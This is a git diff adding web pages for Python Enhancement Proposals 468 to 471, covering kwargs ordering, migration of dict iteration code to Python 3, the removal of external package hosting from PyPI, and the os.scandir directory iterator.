Raymond Hettinger has introduced the idea of a dict implementation that +would result in preserving insertion order on dicts (until the first +deletion). This would be a perfect fit for kwargs. [5]

+

Prognosis:

+

The idea is still uncertain in both viability and timeframe.

+

Note that Python 3.6 now has this dict implementation.

+
+
+

***kwargs

+

This would add a new form to a function’s signature as a mutually +exclusive parallel to **kwargs. The new syntax, ***kwargs (note +that there are three asterisks), would indicate that kwargs should +preserve the order of keyword arguments.

+

Prognosis:

+

New syntax is only added to Python under the most dire circumstances. +With other available solutions, new syntax is not justifiable. +Furthermore, like all opt-in solutions, the new syntax would complicate +the pass-through case.

+
+
+

annotations

+

This is a variation on the decorator approach. Instead of using a +decorator to mark the function, you would use a function annotation on +**kwargs.

+

Prognosis:

+

In addition to the pass-through complication, annotations have been +actively discouraged in Python core development. Use of annotations to +opt-in to order preservation runs the risk of interfering with other +application-level use of annotations.

+
+
+

dict.__order__

+

dict objects would have a new attribute, __order__ that would default +to None and that in the kwargs case the interpreter would use in the +same way as described above for __kworder__.

+

Prognosis:

+

It would mean zero impact on kwargs performance but the change would be +pretty intrusive (Python uses dict a lot). Also, for the wrapper case +the interpreter would have to be careful to preserve __order__.

+
+
+

KWArgsDict.__order__

+

This is the same as the dict.__order__ idea, but kwargs would be an +instance of a new minimal dict subclass that provides the __order__ +attribute. dict would instead be unchanged.

+

Prognosis:

+

Simply switching to OrderedDict is a less complicated and more intuitive +change.

+
+
+
+

Acknowledgements

+

Thanks to Andrew Barnert for helpful feedback and to the participants of +all the past email threads.

+
+
+

Footnotes

+ +
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0468.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0469/index.html b/pep-0469/index.html new file mode 100644 index 00000000000..40ab12a966b --- /dev/null +++ b/pep-0469/index.html @@ -0,0 +1,495 @@ + + + + + + + + PEP 469 – Migration of dict iteration code to Python 3 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 469 – Migration of dict iteration code to Python 3

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
18-Apr-2014
+
Python-Version:
+
3.5
+
Post-History:
+
18-Apr-2014, 21-Apr-2014
+
+
+
+
Table of Contents +
+
+

Abstract

+

For Python 3, PEP 3106 changed the design of the dict builtin and the +mapping API in general to replace the separate list based and iterator based +APIs in Python 2 with a merged, memory efficient set and multiset view +based API. This new style of dict iteration was also added to the Python 2.7 +dict type as a new set of iteration methods.

+

This means that there are now 3 different kinds of dict iteration that may +need to be migrated to Python 3 when an application makes the transition:

+
    +
  • Lists as mutable snapshots: d.items() -> list(d.items())
  • +
  • Iterator objects: d.iteritems() -> iter(d.items())
  • +
  • Set based dynamic views: d.viewitems() -> d.items()
  • +
+

There is currently no widely agreed best practice on how to reliably convert +all Python 2 dict iteration code to the common subset of Python 2 and 3, +especially when test coverage of the ported code is limited. This PEP +reviews the various ways the Python 2 iteration APIs may be accessed, and +looks at the available options for migrating that code to Python 3 by way of +the common subset of Python 2.6+ and Python 3.0+.

+

The PEP also considers the question of whether or not there are any +additions that may be worth making to Python 3.5 that may ease the +transition process for application code that doesn’t need to worry about +supporting earlier versions when eventually making the leap to Python 3.

+
+
+

PEP Withdrawal

+

In writing the second draft of this PEP, I came to the conclusion that +the readability of hybrid Python 2/3 mapping code can actually be best +enhanced by better helper functions rather than by making changes to +Python 3.5+. The main value I now see in this PEP is as a clear record +of the recommended approaches to migrating mapping iteration code from +Python 2 to Python 3, as well as suggesting ways to keep things readable +and maintainable when writing hybrid code that supports both versions.

+

Notably, I recommend that hybrid code avoid calling mapping iteration +methods directly, and instead rely on builtin functions where possible, +and some additional helper functions for cases that would be a simple +combination of a builtin and a mapping method in pure Python 3 code, but +need to be handled slightly differently to get the exact same semantics in +Python 2.

+

Static code checkers like pylint could potentially be extended with an +optional warning regarding direct use of the mapping iteration methods in +a hybrid code base.

+
+
+

Mapping iteration models

+

Python 2.7 provides three different sets of methods to extract the keys, +values and items from a dict instance, accounting for 9 out of the +18 public methods of the dict type.

+

In Python 3, this has been rationalised to just 3 out of 11 public methods +(as the has_key method has also been removed).

+
+

Lists as mutable snapshots

+

This is the oldest of the three styles of dict iteration, and hence the +one implemented by the d.keys(), d.values() and d.items() +methods in Python 2.

+

These methods all return lists that are snapshots of the state of the +mapping at the time the method was called. This has a few consequences:

+
    +
  • the original object can be mutated freely without affecting iteration +over the snapshot
  • +
  • the snapshot can be modified independently of the original object
  • +
  • the snapshot consumes memory proportional to the size of the original +mapping
  • +
+

The semantic equivalent of these operations in Python 3 are +list(d.keys()), list(d.values()) and list(d.iteritems()).

+
+
+

Iterator objects

+

In Python 2.2, dict objects gained support for the then-new iterator +protocol, allowing direct iteration over the keys stored in the dictionary, +thus avoiding the need to build a list just to iterate over the dictionary +contents one entry at a time. iter(d) provides direct access to the +iterator object for the keys.

+

Python 2 also provides a d.iterkeys() method that is essentially +synonymous with iter(d), along with d.itervalues() and +d.iteritems() methods.

+

These iterators provide live views of the underlying object, and hence may +fail if the set of keys in the underlying object is changed during +iteration:

+
>>> d = dict(a=1)
+>>> for k in d:
+...     del d[k]
+...
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+RuntimeError: dictionary changed size during iteration
+
+
+

As iterators, iteration over these objects is also a one-time operation: +once the iterator is exhausted, you have to go back to the original mapping +in order to iterate again.

+

In Python 3, direct iteration over mappings works the same way as it does +in Python 2. There are no method based equivalents - the semantic equivalents +of d.itervalues() and d.iteritems() in Python 3 are +iter(d.values()) and iter(d.items()).

+

The six and future.utils compatibility modules also both provide +iterkeys(), itervalues() and iteritems() helper functions that +provide efficient iterator semantics in both Python 2 and 3.

+
+
+

Set based dynamic views

+

The model that is provided in Python 3 as a method based API is that of set +based dynamic views (technically multisets in the case of the values() +view).

+

In Python 3, the objects returned by d.keys(), d.values() and +d. items() provide a live view of the current state of +the underlying object, rather than taking a full snapshot of the current +state as they did in Python 2. This change is safe in many circumstances, +but does mean that, as with the direct iteration API, it is necessary to +avoid adding or removing keys during iteration, in order to avoid +encountering the following error:

+
>>> d = dict(a=1)
+>>> for k, v in d.items():
+...     del d[k]
+...
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+RuntimeError: dictionary changed size during iteration
+
+
+

Unlike the iteration API, these objects are iterables, rather than iterators: +you can iterate over them multiple times, and each time they will iterate +over the entire underlying mapping.

+

These semantics are also available in Python 2.7 as the d.viewkeys(), +d.viewvalues() and d.viewitems() methods.

+

The future.utils compatibility module also provides +viewkeys(), viewvalues() and viewitems() helper functions +when running on Python 2.7 or Python 3.x.

+
+
+
+

Migrating directly to Python 3

+

The 2to3 migration tool handles direct migrations to Python 3 in +accordance with the semantic equivalents described above:

+
    +
  • d.keys() -> list(d.keys())
  • +
  • d.values() -> list(d.values())
  • +
  • d.items() -> list(d.items())
  • +
  • d.iterkeys() -> iter(d.keys())
  • +
  • d.itervalues() -> iter(d.values())
  • +
  • d.iteritems() -> iter(d.items())
  • +
  • d.viewkeys() -> d.keys()
  • +
  • d.viewvalues() -> d.values()
  • +
  • d.viewitems() -> d.items()
  • +
+

Rather than 9 distinct mapping methods for iteration, there are now only the +3 view methods, which combine in straightforward ways with the two relevant +builtin functions to cover all of the behaviours that are available as +dict methods in Python 2.7.

+

Note that in many cases d.keys() can be replaced by just d, but the +2to3 migration tool doesn’t attempt that replacement.

+

The 2to3 migration tool also does not provide any automatic assistance +for migrating references to these objects as bound or unbound methods - it +only automates conversions where the API is called immediately.

+
+
+

Migrating to the common subset of Python 2 and 3

+

When migrating to the common subset of Python 2 and 3, the above +transformations are not generally appropriate, as they all either result in +the creation of a redundant list in Python 2, have unexpectedly different +semantics in at least some cases, or both.

+

Since most code running in the common subset of Python 2 and 3 supports +at least as far back as Python 2.6, the currently recommended approach to +conversion of mapping iteration operation depends on two helper functions +for efficient iteration over mapping values and mapping item tuples:

+
    +
  • d.keys() -> list(d)
  • +
  • d.values() -> list(itervalues(d))
  • +
  • d.items() -> list(iteritems(d))
  • +
  • d.iterkeys() -> iter(d)
  • +
  • d.itervalues() -> itervalues(d)
  • +
  • d.iteritems() -> iteritems(d)
  • +
+

Both six and future.utils provide appropriate definitions of +itervalues() and iteritems() (along with essentially redundant +definitions of iterkeys()). Creating your own definitions of these +functions in a custom compatibility module is also relatively +straightforward:

+
try:
+    dict.iteritems
+except AttributeError:
+    # Python 3
+    def itervalues(d):
+        return iter(d.values())
+    def iteritems(d):
+        return iter(d.items())
+else:
+    # Python 2
+    def itervalues(d):
+        return d.itervalues()
+    def iteritems(d):
+        return d.iteritems()
+
+
+

The greatest loss of readability currently arises when converting code that +actually needs the list based snapshots that were the default in Python +2. This readability loss could likely be mitigated by also providing +listvalues and listitems helper functions, allowing the affected +conversions to be simplified to:

+
    +
  • d.values() -> listvalues(d)
  • +
  • d.items() -> listitems(d)
  • +
+

The corresponding compatibility function definitions are as straightforward +as their iterator counterparts:

+
try:
+    dict.iteritems
+except AttributeError:
+    # Python 3
+    def listvalues(d):
+        return list(d.values())
+    def listitems(d):
+        return list(d.items())
+else:
+    # Python 2
+    def listvalues(d):
+        return d.values()
+    def listitems(d):
+        return d.items()
+
+
+

With that expanded set of compatibility functions, Python 2 code would +then be converted to “idiomatic” hybrid 2/3 code as:

+
    +
  • d.keys() -> list(d)
  • +
  • d.values() -> listvalues(d)
  • +
  • d.items() -> listitems(d)
  • +
  • d.iterkeys() -> iter(d)
  • +
  • d.itervalues() -> itervalues(d)
  • +
  • d.iteritems() -> iteritems(d)
  • +
+

This compares well for readability with the idiomatic pure Python 3 +code that uses the mapping methods and builtins directly:

+
    +
  • d.keys() -> list(d)
  • +
  • d.values() -> list(d.values())
  • +
  • d.items() -> list(d.items())
  • +
  • d.iterkeys() -> iter(d)
  • +
  • d.itervalues() -> iter(d.values())
  • +
  • d.iteritems() -> iter(d.items())
  • +
+

It’s also notable that when using this approach, hybrid code would never +invoke the mapping methods directly: it would always invoke either a +builtin or helper function instead, in order to ensure the exact same +semantics on both Python 2 and 3.

+
+
+

Migrating from Python 3 to the common subset with Python 2.7

+

While the majority of migrations are currently from Python 2 either directly +to Python 3 or to the common subset of Python 2 and Python 3, there are also +some migrations of newer projects that start in Python 3 and then later +add Python 2 support, either due to user demand, or to gain access to +Python 2 libraries that are not yet available in Python 3 (and porting them +to Python 3 or creating a Python 3 compatible replacement is not a trivial +exercise).

+

In these cases, Python 2.7 compatibility is often sufficient, and the 2.7+ +only view based helper functions provided by future.utils allow the bare +accesses to the Python 3 mapping view methods to be replaced with code that +is compatible with both Python 2.7 and Python 3 (note, this is the only +migration chart in the PEP that has Python 3 code on the left of the +conversion):

+
    +
  • d.keys() -> viewkeys(d)
  • +
  • d.values() -> viewvalues(d)
  • +
  • d.items() -> viewitems(d)
  • +
  • list(d.keys()) -> list(d)
  • +
  • list(d.values()) -> listvalues(d)
  • +
  • list(d.items()) -> listitems(d)
  • +
  • iter(d.keys()) -> iter(d)
  • +
  • iter(d.values()) -> itervalues(d)
  • +
  • iter(d.items()) -> iteritems(d)
  • +
+

As with migrations from Python 2 to the common subset, note that the hybrid +code ends up never invoking the mapping methods directly - it only calls +builtins and helper methods, with the latter addressing the semantic +differences between Python 2 and Python 3.

+
+
+

Possible changes to Python 3.5+

+

The main proposal put forward to potentially aid migration of existing +Python 2 code to Python 3 is the restoration of some or all of the +alternate iteration APIs to the Python 3 mapping API. In particular, +the initial draft of this PEP proposed making the following conversions +possible when migrating to the common subset of Python 2 and Python 3.5+:

+
    +
  • d.keys() -> list(d)
  • +
  • d.values() -> list(d.itervalues())
  • +
  • d.items() -> list(d.iteritems())
  • +
  • d.iterkeys() -> d.iterkeys()
  • +
  • d.itervalues() -> d.itervalues()
  • +
  • d.iteritems() -> d.iteritems()
  • +
+

Possible mitigations of the additional language complexity in Python 3 +created by restoring these methods included immediately deprecating them, +as well as potentially hiding them from the dir() function (or perhaps +even defining a way to make pydoc aware of function deprecations).

+

However, in the case where the list output is actually desired, the end +result of that proposal is actually less readable than an appropriately +defined helper function, and the function and method forms of the iterator +versions are pretty much equivalent from a readability perspective.

+

So unless I’ve missed something critical, readily available listvalues() +and listitems() helper functions look like they will improve the +readability of hybrid code more than anything we could add back to the +Python 3.5+ mapping API, and won’t have any long-term impact on the +complexity of Python 3 itself.

+
+
+

Discussion

+

The fact that 5 years in to the Python 3 migration we still have users +considering the dict API changes a significant barrier to migration suggests +that there are problems with previously recommended approaches. This PEP +attempts to explore those issues and tries to isolate those cases where +previous advice (such as it was) could prove problematic.

+

My assessment (largely based on feedback from Twisted devs) is that +problems are most likely to arise when attempting to use d.keys(), +d.values(), and d.items() in hybrid code. While superficially it +seems as though there should be cases where it is safe to ignore the +semantic differences, in practice, the change from “mutable snapshot” to +“dynamic view” is significant enough that it is likely better +to just force the use of either list or iterator semantics for hybrid code, +and leave the use of the view semantics to pure Python 3 code.

+

This approach also creates rules that are simple enough and safe enough that +it should be possible to automate them in code modernisation scripts that +target the common subset of Python 2 and Python 3, just as 2to3 converts +them automatically when targeting pure Python 3 code.

+
+
+

Acknowledgements

+

Thanks to the folks at the Twisted sprint table at PyCon for a very +vigorous discussion of this idea (and several other topics), and especially +to Hynek Schlawack for acting as a moderator when things got a little too +heated :)

+

Thanks also to JP Calderone and Itamar Turner-Trauring for their email +feedback, as well to the participants in the python-dev review of +the initial version of the PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0469.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0470/index.html b/pep-0470/index.html new file mode 100644 index 00000000000..0ee5f8a486e --- /dev/null +++ b/pep-0470/index.html @@ -0,0 +1,577 @@ + + + + + + + + PEP 470 – Removing External Hosting Support on PyPI | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 470 – Removing External Hosting Support on PyPI

+
+
Author:
+
Donald Stufft <donald at stufft.io>
+
BDFL-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Final
+
Type:
+
Process
+
Topic:
+
Packaging
+
Created:
+
12-May-2014
+
Post-History:
+
14-May-2014, 05-Jun-2014, 03-Oct-2014, 13-Oct-2014, 26-Aug-2015
+
Replaces:
+
438
+
Resolution:
+
Distutils-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes the deprecation and removal of support for hosting files +externally to PyPI as well as the deprecation and removal of the functionality +added by PEP 438, particularly rel information to classify different types of +links and the meta-tag to indicate API version.

+
+
+

Rationale

+

Historically PyPI did not have any method of hosting files nor any method of +automatically retrieving installables, it was instead focused on providing a +central registry of names, to prevent naming collisions, and as a means of +discovery for finding projects to use. In the course of time setuptools began +to scrape these human facing pages, as well as pages linked from those pages, +looking for things it could automatically download and install. Eventually this +became the “Simple” API which used a similar URL structure however it +eliminated any of the extraneous links and information to make the API more +efficient. Additionally PyPI grew the ability for a project to upload release +files directly to PyPI enabling PyPI to act as a repository in addition to an +index.

+

This gives PyPI two equally important roles that it plays in the Python +ecosystem, that of index to enable easy discovery of Python projects and +central repository to enable easy hosting, download, and installation of Python +projects. Due to the history behind PyPI and the very organic growth it has +experienced the lines between these two roles are blurry, and this blurring has +caused confusion for the end users of both of these roles and this has in turn +caused ire between people attempting to use PyPI in different capacities, most +often when end users want to use PyPI as a repository but the author wants to +use PyPI solely as an index.

+

This confusion comes down to end users of projects not realizing if a project +is hosted on PyPI or if it relies on an external service. This often manifests +itself when the external service is down but PyPI is not. People will see that +PyPI works, and other projects works, but this one specific one does not. They +oftentimes do not realize who they need to contact in order to get this fixed +or what their remediation steps are.

+

PEP 438 attempted to solve this issue by allowing projects to explicitly +declare if they were using the repository features or not, and if they were +not, it had the installers classify the links it found as either “internal”, +“verifiable external” or “unverifiable external”. PEP 438 was accepted and +implemented in pip 1.4 (released on Jul 23, 2013) with the final transition +implemented in pip 1.5 (released on Jan 2, 2014).

+

PEP 438 was successful in bringing about more people to utilize PyPI’s +repository features, an altogether good thing given the global CDN powering +PyPI providing speed ups for a lot of people, however it did so by introducing +a new point of confusion and pain for both the end users and the authors.

+

By moving to using explicit multiple repositories we can make the lines between +these two roles much more explicit and remove the “hidden” surprises caused by +the current implementation of handling people who do not want to use PyPI as a +repository.

+
+

Key User Experience Expectations

+
    +
  1. Easily allow external hosting to “just work” when appropriately configured +at the system, user or virtual environment level.
  2. +
  3. Eliminate any and all references to the confusing “verifiable external” and +“unverifiable external” distinction from the user experience (both when +installing and when releasing packages).
  4. +
  5. The repository aspects of PyPI should become just the default package +hosting location (i.e. the only one that is treated as opt-out rather than +opt-in by most client tools in their default configuration). Aside from that +aspect, hosting on PyPI should not otherwise provide an enhanced user +experience over hosting your own package repository.
  6. +
  7. Do all of the above while providing default behaviour that is secure against +most attackers below the nation state adversary level.
  8. +
+
+
+

Why Additional Repositories?

+

The two common installer tools, pip and easy_install/setuptools, both support +the concept of additional locations to search for files to satisfy the +installation requirements and have done so for many years. This means that +there is no need to “phase” in a new flag or concept and the solution to +installing a project from a repository other than PyPI will function regardless +of how old (within reason) the end user’s installer is. Not only has this +concept existed in the Python tooling for some time, but it is a concept that +exists across languages and even extending to the OS level with OS package +tools almost universally using multiple repository support making it extremely +likely that someone is already familiar with the concept.

+

Additionally, the multiple repository approach is a concept that is useful +outside of the narrow scope of allowing projects that wish to be included on +the index portion of PyPI but do not wish to utilize the repository portion of +PyPI. This includes places where a company may wish to host a repository that +contains their internal packages or where a project may wish to have multiple +“channels” of releases, such as alpha, beta, release candidate, and final +release. This could also be used for projects wishing to host files which +cannot be uploaded to PyPI, such as multi-gigabyte data files or, currently at +least, Linux Wheels.

+
+
+

Why Not PEP 438 or Similar?

+

While the additional search location support has existed in pip and setuptools +for quite some time support for PEP 438 has only existed in pip since the 1.4 +version, and still has yet to be implemented in setuptools. The design of +PEP 438 did mean that users still benefited for projects which did not require +external files even with older installers, however for projects which did +require external files, users are still silently being given either potentially +unreliable or, even worse, unsafe files to download. This system is also unique +to Python as it arises out of the history of PyPI, this means that it is almost +certain that this concept will be foreign to most, if not all users, until they +encounter it while attempting to use the Python toolchain.

+

Additionally, the classification system proposed by PEP 438 has, in practice, +turned out to be extremely confusing to end users, so much so that it is a +position of this PEP that the situation as it stands is completely untenable. +The common pattern for a user with this system is to attempt to install a +project possibly get an error message (or maybe not if the project ever +uploaded something to PyPI but later switched without removing old files), see +that the error message suggests --allow-external, they reissue the command +adding that flag most likely getting another error message, see that this time +the error message suggests also adding --allow-unverified, and again issue +the command a third time, this time finally getting the thing they wish to +install.

+

This UX failure exists for several reasons.

+
    +
  1. If pip can locate files at all for a project on the Simple API it will +simply use that instead of attempting to locate more. This is generally the +right thing to do as attempting to locate more would erase a large part of +the benefit of PEP 438. This means that if a project ever uploaded a file +that matches what the user has requested for install that will be used +regardless of how old it is.
  2. +
  3. PEP 438 makes an implicit assumption that most projects would either upload +themselves to PyPI or would update themselves to directly linking to release +files. While a large number of projects did ultimately decide to upload to +PyPI, some of them did so only because the UX around what PEP 438 was so bad +that they felt forced to do so. More concerning however, is the fact that +very few projects have opted to directly and safely link to files and +instead they still simply link to pages which must be scraped in order to +find the actual files, thus rendering the safe variant +(--allow-external) largely useless.
  4. +
  5. Even if an author wishes to directly link to their files, doing so safely is +non-obvious. It requires the inclusion of a MD5 hash (for historical +reasons) in the hash of the URL. If they do not include this then their +files will be considered “unverified”.
  6. +
  7. PEP 438 takes a security centric view and disallows any form of a global opt +in for unverified projects. While this is generally a good thing, it creates +extremely verbose and repetitive command invocations such as:
    $ pip install --allow-external myproject --allow-unverified myproject myproject
    +$ pip install --allow-all-external --allow-unverified myproject myproject
    +
    +
    +
  8. +
+
+
+
+

Multiple Repository/Index Support

+

Installers SHOULD implement or continue to offer, the ability to point the +installer at multiple URL locations. The exact mechanisms for a user to +indicate they wish to use an additional location is left up to each individual +implementation.

+

Additionally the mechanism discovering an installation candidate when multiple +repositories are being used is also up to each individual implementation, +however once configured an implementation should not discourage, warn, or +otherwise cast a negative light upon the use of a repository simply because it +is not the default repository.

+

Currently both pip and setuptools implement multiple repository support by +using the best installation candidate it can find from either repository, +essentially treating it as if it were one large repository.

+

Installers SHOULD also implement some mechanism for removing or otherwise +disabling use of the default repository. The exact specifics of how that is +achieved is up to each individual implementation.

+

Installers SHOULD also implement some mechanism for whitelisting and +blacklisting which projects a user wishes to install from a particular +repository. The exact specifics of how that is achieved is up to each +individual implementation.

+

The Python packaging guide MUST be updated +with a section detailing the options for setting up their own repository so +that any project that wishes to not host on PyPI in the future can reference +that documentation. This should include the suggestion that projects relying on +hosting their own repositories should document in their project description how +to install their project.

+
+ +
+

Summary of Changes

+
+

Repository side

+
    +
  1. Deprecate and remove the hosting modes as defined by PEP 438.
  2. +
  3. Restrict simple API to only list the files that are contained within the +repository.
  4. +
+
+
+

Client side

+
    +
  1. Implement multiple repository support.
  2. +
  3. Implement some mechanism for removing/disabling the default repository.
  4. +
  5. Deprecate / Remove PEP 438
  6. +
+
+
+
+

Impact

+

To determine impact, we’ve looked at all projects using a method of searching +PyPI which is similar to what pip and setuptools use and searched for all +files available on PyPI, safely linked from PyPI, unsafely linked from PyPI, +and finally unsafely available outside of PyPI. When the same file was found +in multiple locations it was deduplicated and only counted it in one location +based on the following preferences: PyPI > Safely Off PyPI > Unsafely Off PyPI. +This gives us the broadest possible definition of impact, it means that any +single file for this project may no longer be visible by default, however that +file could be years old, or it could be a binary file while there is a sdist +available on PyPI. This means that the real impact will likely be much +smaller, but in an attempt not to miscount we take the broadest possible +definition.

+

At the time of this writing there are 65,232 projects hosted on PyPI and of +those, 59 of them rely on external files that are safely hosted outside of PyPI +and 931 of them rely on external files which are unsafely hosted outside of +PyPI. This shows us that 1.5% of projects will be affected in some way by this +change while 98.5% will continue to function as they always have. In addition, +only 5% of the projects affected are using the features provided by PEP 438 to +safely host outside of PyPI while 95% of them are exposing their users to +Remote Code Execution via a Man In The Middle attack.

+
+
+

Frequently Asked Questions

+
+

I can’t host my project on PyPI because of <X>, what should I do?

+

First you should decide if <X> is something inherent to PyPI, or if PyPI could +grow a feature to solve <X> for you. If PyPI can add a feature to enable you to +host your project on PyPI then you should propose that feature. However, if <X> +is something inherent to PyPI, such as wanting to maintain control over your +own files, then you should setup your own package repository and instruct your +users in your project’s description to add it to the list of repositories their +installer of choice will use.

+
+
+

My users have a worse experience with this PEP than before, how do I explain that?

+

Part of this answer is going to be specific to each individual project, you’ll +need to explain to your users what caused you to decide to host in your own +repository instead of utilizing one that they already have in their installer’s +default list of repositories. However, part of this answer will also be +explaining that the previous behavior of transparently including external links +was both a security hazard (given that in most cases it allowed a MITM to +execute arbitrary Python code on the end users machine) and a reliability +concern and that PEP 438 attempted to resolve this by making them explicitly +opt in, but that PEP 438 brought along with it a number of serious usability +issues. PEP 470 represents a simplification of the model to a model that many +users will be familiar with, which is common amongst Linux distributions.

+
+
+

Switching to a repository structure breaks my workflow or isn’t allowed by my host?

+

There are a number of cheap or free hosts that would gladly support what is +required for a repository. In particular you don’t actually need to upload your +files anywhere differently as long as you can generate a host with the correct +structure that points to where your files are actually located. Many of these +hosts provide free HTTPS using a shared domain name, and free HTTPS +certificates can be gotten from StartSSL, or in +the near future LetsEncrypt or they may be gotten +cheap from any number of providers.

+
+
+

Why don’t you provide <X>?

+

The answer here will depend on what <X> is, however the answers typically are +one of:

+
    +
  • We hadn’t been thought of it and nobody had suggested it before.
  • +
  • We don’t have sufficient experience with <X> to properly design a solution +for it and would welcome a domain expert to help us provide it.
  • +
  • We’re an open source project and nobody has decided to volunteer to design +and implement <X> yet.
  • +
+

Additional PEPs to propose additional features are always welcome, however they +would need someone with the time and expertise to accurately design <X>. This +particular PEP is intended to focus on getting us to a point where the +capabilities of PyPI are straightforward with an easily understood baseline +that is similar to existing models such as Linux distribution repositories.

+
+
+

Why should I register on PyPI if I’m running my own repository anyways?

+

PyPI serves two critical functions for the Python ecosystem. One of those is as +a central repository for the actual files that get downloaded and installed by +pip or another package manager and it is this function that this PEP is +concerned with and that you’d be replacing if you’re running your own +repository. However, it also provides a central registry of who owns what name +in order to prevent naming collisions, think of it sort of as DNS but for +Python packages. In addition to making sure that names are handed out in a +first-come, first-served manner it also provides a single place for users to go +to look search for and discover new projects. So the simple answer is, you +should still register your project with PyPI to avoid naming collisions and to +make it so people can still easily discover your project.

+
+
+
+

Rejected Proposals

+
+

Allow easier discovery of externally hosted indexes

+

A previous version of this PEP included a new feature added to both PyPI and +installers that would allow project authors to enter into PyPI a list of +URLs that would instruct installers to ignore any files uploaded to PyPI and +instead return an error telling the end user about these extra URLs that they +can add to their installer to make the installation work.

+

This feature has been removed from the scope of the PEP because it proved too +difficult to develop a solution that avoided UX issues similar to those that +caused so many problems with the PEP 438 solution. If needed, a future PEP +could revisit this idea.

+
+
+

Keep the current classification system but adjust the options

+

This PEP rejects several related proposals which attempt to fix some of the +usability problems with the current system but while still keeping the general +gist of PEP 438.

+

This includes:

+
    +
  • Default to allowing safely externally hosted files, but disallow unsafely +hosted.
  • +
  • Default to disallowing safely externally hosted files with only a global flag +to enable them, but disallow unsafely hosted.
  • +
  • Continue on the suggested path of PEP 438 and remove the option to unsafely +host externally but continue to allow the option to safely host externally.
  • +
+

These proposals are rejected because:

+
    +
  • The classification system introduced in PEP 438 in an entirely unique concept +to PyPI which is not generically applicable even in the context of Python +packaging. Adding additional concepts comes at a cost.
  • +
  • The classification system itself is non-obvious to explain and to +pre-determine what classification of link a project will require entails +inspecting the project’s /simple/<project>/ page, and possibly any URLs +linked from that page.
  • +
  • The ability to host externally while still being linked for automatic +discovery is mostly a historic relic which causes a fair amount of pain and +complexity for little reward.
  • +
  • The installer’s ability to optimize or clean up the user interface is limited +due to the nature of the implicit link scraping which would need to be done. +This extends to the --allow-* options as well as the inability to +determine if a link is expected to fail or not.
  • +
  • The mechanism paints a very broad brush when enabling an option, while +PEP 438 attempts to limit this with per package options. However a project +that has existed for an extended period of time may oftentimes have several +different URLs listed in their simple index. It is not unusual for at least +one of these to no longer be under control of the project. While an +unregistered domain will sit there relatively harmless most of the time, pip +will continue to attempt to install from it on every discovery phase. This +means that an attacker simply needs to look at projects which rely on unsafe +external URLs and register expired domains to attack users.
  • +
+
+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0470.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0471/index.html b/pep-0471/index.html new file mode 100644 index 00000000000..4be929003a7 --- /dev/null +++ b/pep-0471/index.html @@ -0,0 +1,733 @@ + + + + + + + + PEP 471 – os.scandir() function – a better and faster directory iterator | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 471 – os.scandir() function – a better and faster directory iterator

+
+
Author:
+
Ben Hoyt <benhoyt at gmail.com>
+
BDFL-Delegate:
+
Victor Stinner <vstinner at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
30-May-2014
+
Python-Version:
+
3.5
+
Post-History:
+
27-Jun-2014, 08-Jul-2014, 14-Jul-2014
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes including a new directory iteration function, +os.scandir(), in the standard library. This new function adds +useful functionality and increases the speed of os.walk() by 2-20 +times (depending on the platform and file system) by avoiding calls to +os.stat() in most cases.

+
+
+

Rationale

+

Python’s built-in os.walk() is significantly slower than it needs +to be, because – in addition to calling os.listdir() on each +directory – it executes the stat() system call or +GetFileAttributes() on each file to determine whether the entry is +a directory or not.

+

But the underlying system calls – FindFirstFile / +FindNextFile on Windows and readdir on POSIX systems – +already tell you whether the files returned are directories or not, so +no further system calls are needed. Further, the Windows system calls +return all the information for a stat_result object on the directory +entry, such as file size and last modification time.

+

In short, you can reduce the number of system calls required for a +tree function like os.walk() from approximately 2N to N, where N +is the total number of files and directories in the tree. (And because +directory trees are usually wider than they are deep, it’s often much +better than this.)

+

In practice, removing all those extra system calls makes os.walk() +about 8-9 times as fast on Windows, and about 2-3 times as fast +on POSIX systems. So we’re not talking about +micro-optimizations. See more benchmarks here.

+

Somewhat relatedly, many people (see Python Issue 11406) are also +keen on a version of os.listdir() that yields filenames as it +iterates instead of returning them as one big list. This improves +memory efficiency for iterating very large directories.

+

So, as well as providing a scandir() iterator function for calling +directly, Python’s existing os.walk() function can be sped up a +huge amount.

+
+
+

Implementation

+

The implementation of this proposal was written by Ben Hoyt (initial +version) and Tim Golden (who helped a lot with the C extension +module). It lives on GitHub at benhoyt/scandir. (The implementation +may lag behind the updates to this PEP a little.)

+

Note that this module has been used and tested (see “Use in the wild” +section in this PEP), so it’s more than a proof-of-concept. However, +it is marked as beta software and is not extensively battle-tested. +It will need some cleanup and more thorough testing before going into +the standard library, as well as integration into posixmodule.c.

+
+
+

Specifics of proposal

+
+

os.scandir()

+

Specifically, this PEP proposes adding a single function to the os +module in the standard library, scandir, that takes a single, +optional string as its argument:

+
scandir(path='.') -> generator of DirEntry objects
+
+
+

